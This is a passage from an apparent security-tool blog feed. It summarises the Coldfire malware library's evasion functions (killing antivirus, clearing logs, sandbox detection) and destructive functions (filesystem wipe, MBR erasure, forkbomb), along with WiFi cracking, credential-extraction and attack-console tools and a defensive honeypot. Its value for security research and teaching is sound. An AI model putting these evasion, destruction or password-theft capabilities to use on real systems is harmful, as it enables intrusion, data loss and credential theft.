/><br />func SendDataTcp(host string, port int, data string) error <br /> Sends string to a remote host using TCP protocol.<br /><br />func SendDataUdp(host string, port int, data string) error <br /> Sends string to a remote host using UDP protocol.<br /> <br />func Download(url string) error<br /> Downloads a file from url and save it under the same name.<br /><br />func CopyFile(src string, dst string) error<br /> Copy a file from one place to another<br /><br />func CurrentDirFiles() []string, error<br /> Returns list of files from current directory<br /></code></pre></div> <br /><span style="font-size: large;"><b>Evasion functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func PkillPid(pid int) error Kill process by PID. func PkillName(name string) errror Kill all processes that contain [name]. func PkillAv() err Kill most common AV processes. func Wait(interval string) Does nothing for a given interval of time. func Remove() Removes binary from the host. func SetTtl(interval string) Set time-to-live of the binary. Should be launched as goroutine. func ClearLogs() error Clears most system logs. "><pre><code>func PkillPid(pid int) error<br /> Kill process by PID.<br /><br />func PkillName(name string) errror<br /> Kill all processes that contain [name].<br /><br />func PkillAv() err<br /> Kill most common AV processes.<br /> <br />func Wait(interval string)<br /> Does nothing for a given interval of time.<br /><br />func Remove()<br /> Removes binary from the host.<br /> <br />func SetTtl(interval string)<br /> Set time-to-live of the binary.<br /> Should be launched as goroutine.<br /> <br />func ClearLogs() error<br /> Clears most system logs.<br /></code></pre></div> <br /><span style="font-size: large;"><b>Sandbox detection functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func SandboxFilepath() bool Detect sandbox by looking for common sandbox filepaths. Compatible only with windows. func SandboxProc() bool Detect sandbox by looking for common sandbox processes. func SandboxSleep() bool Detect sandbox by looking for sleep-accelleration mechanism. func SandboxDisk(size int) bool Detect sandbox by looking for abnormally small disk size. func SandboxCpu(cores int) bool Detect sandbox by looking for abnormally small number of cpu cores. func SandboxRam(ram_mb int) bool Detect sandbox by looking for abnormally small amount of RAM. func SandboxMac() bool Detect sandbox by looking for sandbox-specific MAC address of the localhost. func SandboxUtc() bool Detect sandbox by looking for properly set UTC time zone. func SandboxProcnum(proc_num int) bool Detect sandbox if small number of running processes func SandboxTmp(entries int) bool Detect sandbox if small number of entries under remporary dir func SandboxAll() bool Detect sandbox using all sandbox detection methods. Returns true if any sandbox-detection method returns true. func SandboxAll_n(num int) bool Detect sandbox using all sandbox detection methods. Returns true if at least <num> detection methods return true. "><pre><code>func SandboxFilepath() bool <br /> Detect sandbox by looking for common sandbox filepaths.<br /> Compatible only with windows.<br /><br />func SandboxProc() bool <br /> Detect sandbox by looking for common sandbox processes.<br /><br />func SandboxSleep() bool<br /> Detect sandbox by looking for sleep-accelleration mechanism.<br /><br />func SandboxDisk(size int) bool<br /> Detect sandbox by looking for abnormally small disk size.<br /><br />func SandboxCpu(cores int) bool<br /> Detect sandbox by looking for abnormally small number of cpu cores.<br /><br />func SandboxRam(ram_mb int) bool<br /> Detect sandbox by looking for abnormally small amount of RAM.<br /><br />func SandboxMac() bool<br /> Detect sandbox by looking for sandbox-specific MAC address of the localhost. <br /><br />func SandboxUtc() bool<br /> Detect sandbox by looking for properly set UTC time zone. <br /><br />func SandboxProcnum(proc_num int) bool <br /> Detect sandbox if small number of running p rocesses<br /><br />func SandboxTmp(entries int) bool <br /> Detect sandbox if small number of entries under remporary dir<br /><br />func SandboxAll() bool<br /> Detect sandbox using all sandbox detection methods.<br /> Returns true if any sandbox-detection method returns true. <br /><br />func SandboxAll_n(num int) bool<br /> Detect sandbox using all sandbox detection methods.<br /> Returns true if at least <num> detection methods return true.<br /></code></pre></div> <br /><span style="font-size: large;"><b>Disruptive functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func WifiDisconnect() error Disconnects from wireless access point func Wipe() error Wipes out entire filesystem. func EraseMbr(device string, partition_table bool) error Erases MBR sector of a device. If <partition_table> is true, erases also partition table. func Forkbomb() Runs a forkbomb. func Shutdown() error Reboot the machine. "><pre><code>func WifiDisconnect() error <br /> Disconnects from wireless access point<br /> <br />func Wipe() error<br /> Wipes out entire filesystem.<br /> <br />func EraseMbr(device string, partition_table bool) error <br /> Erases MBR sector of a device.<br /> If <partition_table> is true, erases also partition table.<br /> <br />func Forkbomb()<br /> Runs a forkbomb.<br /> <br />func Shutdown() error<br /> Reboot the machine.<br /><br /></code></pre></div> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=""github.com/google/gopacket" "github.com/google/gopacket/layers" "github.com/google/gopacket/pcap" "github.com/robfig/cron" "github.com/anvie/port-scanner" "github.com/matishsiao/goInfo" "github.com/fatih/color" "github.com/minio/minio/pkg/disk" "github.com/dustin/go-humanize" "github.com/mitchellh/go-ps" "><pre><code>"github.com/google/gopacket"<br />"github.com/google/gopacket/layers"<br />"github.com/google/gopacket/pcap"<br />"github.com/robfig/cron"<br />"github.com/anvie/port-scanner"<br />"github.com/matishsiao/goInfo"<br />"github.com/fatih/color"<br />"github.com/minio/minio/pkg/disk"<br />"github.com/dustin/go-humanize"<br />"github.com/mitchellh/go-ps"<br /></code></pre></div> <br /><span style="font-size: x-large;"><b>Disclaimer</b></span><br /> <p>Developers are not responsible for any misuse regarding this tool. Use it only against systems that you are permitted to attack.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redcode-labs/Coldfire" rel="nofollow" target="_blank" title="Download Coldfire">Download Coldfire</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19294894468149043442021-02-26T08:30:00.005-03:002021-02-26T08:30:06.705-03:00OpenWifiPass - An Open Source Implementation Of Apple's Wi-Fi Password Sharing Protocol In Python<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-hl1ui4DNJnI/YDSUvQ6K-8I/AAAAAAAAVcA/1CJUslQwoAQQGiG45ItDg229cvNM7nXOgCNcBGAsYHQ/s787/wifi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="474" data-original-width="787" height="386" src="https://1.bp.blogspot.com/-hl1ui4DNJnI/YDSUvQ6K-8I/AAAAAAAAVcA/1CJUslQwoAQQGiG45ItDg229cvNM7nXOgCNcBGAsYHQ/w640-h386/wifi.png" width="640" /></a></div><p><br /></p> <p>An open source implementation of the grantor role in Apple's Wi-Fi Password Sharing protocol.</p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>OpenWifiPass is experimental software and is the result of reverse engineering efforts by the <a href="https://owlink.org" rel="nofollow" target="_blank" title="Open Wireless Link">Open Wireless Link</a> project. The code serves solely documentary and educational purposes. It is <em>untested</em> and <em>incomplete</em>. For example, the code <strong>does not verify the identity of the requestor</strong>. So, do not use this implementation with sensitive Wi-Fi credentials. OpenWifiPass is not affiliated with or endorsed by Apple Inc.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requirements</b></span><br /> <p><strong>Hardware:</strong> <a href="https://www.kitploit.com/search/label/Bluetooth%20Low%20Energy" target="_blank" title="Bluetooth Low Energy">Bluetooth Low Energy</a> radio, e.g., <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> 4</p> <p><strong>OS:</strong> Linux (due to the <code>bluepy</code> dependency)</p> <br /><span style="font-size: large;"><b>Install</b></span><br /> <p>Clone this repository and install it:</p> <div><pre><code>git clone git@github.com/seemoo-lab/openwifipass.git<br />pip3 install ./openwifipass</code></pre></div> <br /><span style="font-size: large;"><b>Run</b></span><br /> <p>Run <code>openwifipass</code> to share Wi-Fi credentials (<code>SSID</code> and <code>PSK</code>) with <em>any</em> requestor (we need super user privileges to use the Bluetooth subsystem):</p> <div><pre><code>sudo -E python3 -m openwifipass --ssid <SSID> --psk <PSK></code></pre></div> <p><strong>Use <a href="https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html#Quoting" rel="nofollow" target="_blank" title="quoting">quoting</a> of your shell to remove special meaning of certain characters in <code>SSID</code>/<code>PSK</code>.</strong> In the example below, we use single quotes (<code>'</code>) to prevent shell expansion of the <code>$</code> character in the PSK.</p> <p>A successful run of the protocol would look as follows:</p> <pre><code>pi@raspberrypi:~/openwifipass $ sudo -E python3 -m openwifipass --ssid OWL --psk '$uper$ecretPassword'<br />Start scanning...<br />SSID match in PWS advertisement from aa:bb:cc:dd:ee:ff<br />Connect to device aa:bb:cc:dd:ee:ff<br />Send PWS1<br />Receive PWS2<br />Send M1<br />Receive M2<br />Send M3<br />Receive M4<br />Send PWS3<br />Receive PWS4<br />Wi-Fi Password Sharing completed<br /></code></pre> <br /><span style="font-size: large;"><b>OPACK</b></span><br /> <p>This projects contains a reusable OPACK (de)serializer. Read <a href="https://github.com/seemoo-lab/openwifipass/blob/main/OPACK.md" rel="nofollow" target="_blank" title="OPACK.md">OPACK.md</a> for more information.</p> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <ul> <li>Jannik Lorenz</li> </ul> <br /><span style="font-size: large;"><b>Publications</b></span><br /> <ul> <li>Milan Stute, Alexander Heinrich, Jannik Lorenz, and Matthias Hollick. <strong>Disrupting Continuity of Apple’s Wireless Ecosystem Security: New Tracking, DoS, and MitM Attacks on iOS and macOS Through Bluetooth Low Energy, AWDL, and Wi-Fi.</strong> <em>30th USENIX Security Symposium (USENIX Security ’21)</em>, August 11–13, 2021, Vancouver, B.C., Canada. <em>To appear</em>.</li> <li>Jannik Lorenz. <strong>Wi-Fi Sharing for All: <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="Reverse Engineering">Reverse Engineering</a> and Breaking the Apple Wi-Fi Password Sharing Protocol.</strong> Bachelor thesis, <em>Technical University of Darmstadt</em>, March 2020.</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/seemoo-lab/openwifipass" rel="nofollow" target="_blank" title="Download Openwifipass">Download Openwifipass</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74871803417259985552021-01-19T08:30:00.010-03:002021-01-19T08:30:03.534-03:00HosTaGe - Low Interaction Mobile Honeypot<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/s730/HosTaGe_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="349" height="640" src="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/w306-h640/HosTaGe_0.png" width="306" /></a></div><p><br /></p><p></p> <p>HosTaGe is a lightweight, low-interaction, portable, and generic <a href="https://www.kitploit.com/search/label/HoneyPot" target="_blank" title="honeypot">honeypot</a> for mobile devices that aims on the detection of malicious, <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> network environments. As most malware propagate over the network via specific protocols, a low-interaction honeypot located at a mobile device can check wireless networks for actively propagating malware. We envision such honeypots running on all kinds of mobile devices, e.g., smartphones and tablets, to provide a quick assessment on the potential security state of a network.</p> <p>HosTaGe emulates the following <a href="https://www.kitploit.com/search/label/Protocols" target="_blank" title="protocols">protocols</a> as of the latest version: AMQP, COAP, ECHO, FTP, HTTP, HTTPS, MySQL, MQTT, MODBUS, S7COMM, SNMP, SIP, SMB, SSH, SMTP and TELNET</p><span><a name='more'></a></span><p><br /></p> <p><strong>Download from Play Store!</strong></p> <p>The stable release of HosTaGe can be installed from Google Play Store. <a href="https://play.google.com/store/apps/details?id=dk.aau.netsec.hostage" rel="nofollow" target="_blank" title="Play Store Link">Play Store Link</a> or, Scan the QR code below from your <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> device.</p><p><br /></p><p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/nRrc2T8_oKM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p><br /></p> <p><strong>References</strong></p> <p>The <a href="https://www.kitploit.com/search/label/Research" target="_blank" title="research">research</a> behind HosTaGe has been published and presented in a number of scientific and industrial conferences. Below you can find some selected papers:</p> <p>[1] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Mihai Plasoianu, Wulf Pfeiffer, Lars Pandikow, Max Mühlhäuser: This Network is Infected: HosTaGe – a Low-Interaction Honeypot for Mobile Devices. SPSM@CCS 2013:43-48</p> <p>[2] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Max Mühlhäuser: HosTaGe: a Mobile Honeypot for Collaborative Defense. ACM SIN 2014:330-333</p> <p>[3] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Max Mühlhäuser: Did you really hack a nuclear power plant? An industrial control mobile honeypot. IEEE CNS 2015:729-730</p> <p>[4] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Carlos Garcia Cordero, Max Mühlhäuser: Multi-stage Attack Detection and Signature Generation with ICS Honeypots. IEEE/IFIP DISSECT@NOMS 2016:1227-1232</p> <p><strong>Download APK</strong></p> <p><a href="https://github.com/aau-network-security/HosTaGe/releases/download/v2.2.11/HosTaGe-2.2.11.apk" rel="nofollow" target="_blank" title="HosTaGe-v2.2.11.apk">HosTaGe-v2.2.11.apk</a> <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.2.11" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a>(latest)</p> <p>HosTaGe-v2.1.1.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.1.1" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p>HosTaGe-v2.0.0.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.0.0" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p><strong>Wiki</strong></p> <p>The Wiki provides information on getting started and using the app. Wiki for HosTaGe can be found here: <a href="https://github.com/aau-network-security/HosTaGe/wiki/2.-Getting-Started" rel="nofollow" target="_blank" title="Wiki">Wiki</a>.</p> <p><strong>GUI</strong></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/s740/HosTaGe_4_alert.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="740" data-original-width="350" height="640" src="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/w302-h640/HosTaGe_4_alert.gif" width="302" /></a></div><p><br /></p> <p><strong>Original Authors</strong></p> <p><a href="https://mvasiloma.com/" rel="nofollow" target="_blank" title="Emmanouil Vasilomanolakis">Emmanouil Vasilomanolakis</a> - idea, guidance and suggestions during development</p> <p><strong>Contributors</strong></p> <p><a href="https://sastry17.github.io/" rel="nofollow" target="_blank" title="Shreyas Srinivasa">Shreyas Srinivasa</a>, lead developer, Aalborg University and Technische Universität Darmstadt (Github - @sastry17)</p> <p>Eirini Lygerou, GSoC 2020 Developer (Github - @irinil)</p> <p>Mihai Plasoianu, student developer, Technische Universität Darmstadt</p> <p>Wulf Pfeiffer, student developer, Technische Universität Darmstadt</p> <p>Lars Pandikow, student developer, Technische Universität Darmstadt</p> <p><strong>Researchers</strong></p> <p><a href="https://www.kshankar.com/" rel="nofollow" target="_blank" title="Shankar Karuppayah">Shankar Karuppayah</a>, mentoring, developer, Technische Universität Darmstadt</p> <p><a href="https://www.inf.uni-hamburg.de/inst/ab/snp/team/fischer.html" rel="nofollow" target="_blank" title="Mathias Fischer">Mathias Fischer</a>, mentoring, Universität Hamburg</p> <p><a href="https://www.informatik.tu-darmstadt.de/telekooperation/telecooperation_group/staff_1/staff_1_details_23168.en.jsp" rel="nofollow" target="_blank" title="Max Mühlhäuser">Max Mühlhäuser</a>, mentoring, Technische Universität Darmstadt</p> <p>Carlos Garcia Cordero, mentoring, Technische Universität Darmstadt</p> <p>Features of HoneyRJ were inspiration for this project. <a href="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html%5C" rel="nofollow" target="_blank" title="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html\">http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html\</a></p> <p>Encryption for the SSH protocol were taken from Ganymed SSH-2 and slightly modified. <a href="http://code.google.com/p/ganymed-ssh-2/" rel="nofollow" target="_blank" title="http://code.google.com/p/ganymed-ssh-2/">http://code.google.com/p/ganymed-ssh-2/</a></p> <p><strong>GSoC 2020</strong></p> <p>The project was actively developed with participation in Google Summer of Code 2020. More information about GSoC2020 is <a href="https://summerofcode.withgoogle.com/projects/#5293206515744768" rel="nofollow" target="_blank" title="here">here</a></p> <p><strong>HPFeeds</strong></p> <p>To access the hpfeeds from hostage please send an access request to <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="hostage@es.aau.dk">hostage@es.aau.dk</a> with your name and organization. Please note that access to the hpfeeds repository is provided only after an internal review.</p> <p><strong>Contact</strong></p> <p>Please use the Github issues to report any issues or for questions. <a href="https://honeynetpublic.slack.com/archives/CUCJPUE3H" rel="nofollow" target="_blank" title="Slack channel">Slack channel</a>; <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="Email">Email</a></p> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aau-network-security/HosTaGe" rel="nofollow" target="_blank" title="Download HosTaGe">Download HosTaGe</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-4204514429739899642020-09-04T17:30:00.000-04:002020-09-04T17:30:01.801-04:00H4Rpy - Automated WPA/WPA2 PSK Attack Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s1600/h4rpy_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1366" height="344" src="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s640/h4rpy_2.png" width="640" /></a></div>
<br />
<strong>h4rpy</strong> is an <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> WPA/WPA2 PSK attack tool, wrapper of <a href="https://github.com/aircrack-ng/aircrack-ng" rel="nofollow" target="_blank" title="aircrack-ng framework">aircrack-ng framework</a>.<br />
<strong>h4rpy</strong> provides clean interface for automated <a href="https://www.kitploit.com/search/label/Cracking" target="_blank" title="cracking">cracking</a> of WPA/WPA2 PSK networks. <strong>h4rpy</strong> enables monitor mode on selected <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> interface, scans the wireless space for access points, tries to capture WPA/WPA2 4-way <a href="https://www.kitploit.com/search/label/Handshake" target="_blank" title="handshake">handshake</a> for the acess point, and starts a dictionary attack on the handshake. It is also possible to send disassociate packets to clients associated with access point.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation:</b></span><br />
Installation consists of cloning the repo, running a script that will install dependencies (<a href="https://github.com/aircrack-ng/aircrack-ng" rel="nofollow" target="_blank" title="aircrack-ng framework">aircrack-ng framework</a> and <a href="https://code.launchpad.net/terminator/" rel="nofollow" target="_blank" title="Terminator">Terminator</a> are required in order to run <strong>h4rpy</strong>), and making <strong>h4rpy</strong> executable. Script only works with apt package manager (Debian based distributions).<br />
<pre><code># git clone https://github.com/MS-WEB-BN/h4rpy/
# cd h4rpy
# sudo bash config.sh
# sudo chmod +x h4rpy</code></pre>
<br />
<span style="font-size: large;"><b>Usage:</b></span><br />
To run h4rpy:<br />
<pre><code># sudo ./h4rpy</code></pre>
<strong>Top-left</strong>: Enabling monitor mode, <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> for access points (packet capturing of raw 802.11 frames);<br />
<strong>Top-right</strong>: Packet capturing on selected wireless network, capturing the WPA/WPA2 4-way handshake;<br />
<strong>Bottom-left</strong>: Sends disassocate packets to clients which are currently associated with a selected access point;<br />
<strong>Bottom-right</strong>: Dictionary attack on the captured WPA/WPA2 4-way handshake.<br />
<br />
<span style="font-size: large;"><b>Screenshots:</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-zgzClP_nR_k/X0wSj42WUEI/AAAAAAAATqo/L1MdDC0uJ2c1nnTsYBi4wuH7_Nj2LIbzgCNcBGAsYHQ/s1600/h4rpy_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1366" height="344" src="https://1.bp.blogspot.com/-zgzClP_nR_k/X0wSj42WUEI/AAAAAAAATqo/L1MdDC0uJ2c1nnTsYBi4wuH7_Nj2LIbzgCNcBGAsYHQ/s640/h4rpy_1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s1600/h4rpy_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1366" height="344" src="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s640/h4rpy_2.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Disclaimer:</b></span><br />
Any actions and/or activities done by using <strong>h4rpy</strong> are solely your responsibility. The misuse of <strong>h4rpy</strong> can result in criminal charges brought against the persons in question. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing <strong>h4rpy</strong> to break the law.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/MS-WEB-BN/h4rpy" rel="nofollow" target="_blank" title="Download H4Rpy">Download H4Rpy</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-64775128090999008992020-09-01T17:30:00.000-04:002020-09-01T17:30:07.579-04:00Killchain - A Unified Console To Perform The "Kill Chain" Stages Of Attacks<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-L_rnju5D65I/X0v9wRi2hNI/AAAAAAAATpI/kufw_Xvy2rQuswwoQUeRCrd0NDdlEZiRgCNcBGAsYHQ/s1600/killchain2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="554" data-original-width="493" src="https://1.bp.blogspot.com/-L_rnju5D65I/X0v9wRi2hNI/AAAAAAAATpI/kufw_Xvy2rQuswwoQUeRCrd0NDdlEZiRgCNcBGAsYHQ/s1600/killchain2.png" /></a></div>
<br />
<br />
<b><span style="font-size: large;">What is “Kill Chain”?</span></b><br />
<blockquote>
<a href="https://en.wikipedia.org/wiki/Kill_chain" rel="nofollow">From Wikipedia</a>: The term kill chain was originally used as a military concept related
to the structure of an attack; consisting of target identification, force dispatch to
target, decision, order to attack the target, and finally the destruction of the target.</blockquote>
<ul>
<li><strong>Reconnaissance</strong> – Uses social engineering to find weaknesses in the target’s security
posture.</li>
<li><strong>Weaponization</strong> – Crafting attack tools for the target system.</li>
<li><strong>Delivery</strong> – Delivering the attack tools to the target system.</li>
<li><strong>Exploit</strong> – The malicious file intended for an application target system or the
operating system vulnerabilities control objectives is opened by the victim on target
system.</li>
<li><strong>Installation</strong> – Remote control program installed on target system.</li>
<li><strong>Command & Control</strong> – Successfully compromised hosts will create a C2 channel on
the Internet to establish a connection with the C2 server.</li>
<li><strong>Actions</strong> – After the preceding process, the attacker will continue to steal information
about the target system, undermine the integrity and availability of information, and
further to control the machine to jump to attack other machines, to expand the
sphere of influence.</li>
</ul>
<a name='more'></a><br />
<b>Dependent tool sets are:</b><br />
<ol>
<li> Tor -- For the console build-in <a href="https://github.com/ruped24/toriptables2" rel="nofollow" target="_blank" title="anonymizer">anonymizer</a>.<br />
</li>
<li> Set -- <a href="https://www.kitploit.com/search/label/Social-Engineer" target="_blank" title="Social-Engineer">Social-Engineer</a> Toolkit (SET), attacks against humans.<br />
</li>
<li> OpenVas -- <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="Vulnerability">Vulnerability</a> scanning and vulnerability management.<br />
</li>
<li> Veil-Evasion -- Generate <a href="https://www.kitploit.com/search/label/Metasploit" target="_blank" title="metasploit">metasploit</a> payloads bypass anti-virus.<br />
</li>
<li> Websploit -- WebSploit Advanced MITM Framework.<br />
</li>
<li> Metasploit -- Executing exploit code against target.<br />
</li>
<li> WiFite -- <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> wireless auditor, designed for Linux.</li>
</ol>
<br />
<span style="font-size: large;"><b><a href="https://github.com/ruped24/killchain/wiki/Kill-Chain-Setup#setting-up-your-kill-chain-environment" rel="nofollow" target="_blank" title="killchain Setup">killchain Setup</a></b></span><br />
<br />
<span style="font-size: large;"><b><a href="https://github.com/ruped24/tor_ip_switcher" rel="nofollow" target="_blank" title="killchain Add-on">killchain Add-on</a></b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ruped24/killchain" rel="nofollow" target="_blank" title="Download Killchain">Download Killchain</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-62254131778561734282020-07-16T08:30:00.000-04:002020-07-16T08:30:03.576-04:00WiFi Passview v4.0 - An Open Source Batch Script Based WiFi Passview For Windows!<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-q75fs2gudPM/XwueDLlgvCI/AAAAAAAATFQ/SGvQWqclgQkL3az1pa5mYioQvkAHJAQiACNcBGAsYHQ/s1600/wifi-passview_8_wifi-passview-github-banner.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="304" data-original-width="1280" height="152" src="https://1.bp.blogspot.com/-q75fs2gudPM/XwueDLlgvCI/AAAAAAAATFQ/SGvQWqclgQkL3az1pa5mYioQvkAHJAQiACNcBGAsYHQ/s640/wifi-passview_8_wifi-passview-github-banner.jpeg" width="640" /></a></div>
<br />
<strong>WiFi Passview</strong> is an open-source batch script-based program that can recover your WiFi Password easily in seconds. This is for Windows OS only. Basically, this scripted program has the same function as other passview software such as webpassview and mailpassview. <a href="https://github.com/warengonzaga/wifi-passview/wiki" rel="nofollow" target="_blank" title="Visit Wiki">Visit Wiki</a><br />
<em><strong>Disclaimer</strong>: WiFi Passview is <strong>NOT</strong> designed for malicious use! Please use this program responsibly!</em><br />
<a name='more'></a><br />
<span style="font-size: large;"><b>How it Works</b></span><br />
Basically, this is the shortcut and batch scripted file version of a popular WiFi password manager viewing method using the command prompt. This is how it works...<br />
<div>
<pre><code>netsh wlan show profiles</code></pre>
</div>
When you use this tool, you are able to extract the WiFi <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> stored on the target machine in just seconds.<br />
To learn more <a href="https://github.com/warengonzaga/wifi-passview/wiki" rel="nofollow" target="_blank" title="visit Wiki">visit Wiki</a> page...<br />
<br />
<span style="font-size: large;"><b>Features</b></span><br />
This simple tool offers you the following features...<br />
<ul>
<li>Extract all available WiFi passwords stored in the target machine and can be done in just a seconds.</li>
<li>Extract password from specific target SSID.</li>
<li>Save extracted passwords.</li>
<li>Additional options.</li>
<li>No manual reading of <strong><code>Key Content</code></strong>, the tool will do that for you!</li>
<li>No need admin rights to run the program.</li>
<li>Standalone batch program.</li>
<li>Supports all languages.</li>
<li>Generate WLAN report. (requires admin privileges)</li>
<li>Upload collected passwords to the cloud. (powered by file.io api)</li>
<li>Customizable builds.</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
Download the repository and look for <strong><code>"wifi-passview-vX.X.X.bat"</code></strong> file and run it as ordinary <code>*.bat</code> file (<em>no need to run it as administrator</em>). All you have to do is to follow the on-screen instructions.<br />
Read the official blog on <strong><a href="https://warengonzaga.com/wifi-passview-for-windows-os" rel="nofollow" target="_blank" title="How to Use WiFi Passview">How to Use WiFi Passview</a></strong>.<br />
<em>Wanna use for WiFi Hacking? Visit this <a href="https://www.buymeacoffee.com/p/40225" rel="nofollow" target="_blank" title="exclusive post from the author">exclusive post from the author</a>.</em><br />
<br />
<span style="font-size: large;"><b>Screenshots</b></span><br />
Here's the screeshot of the program...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
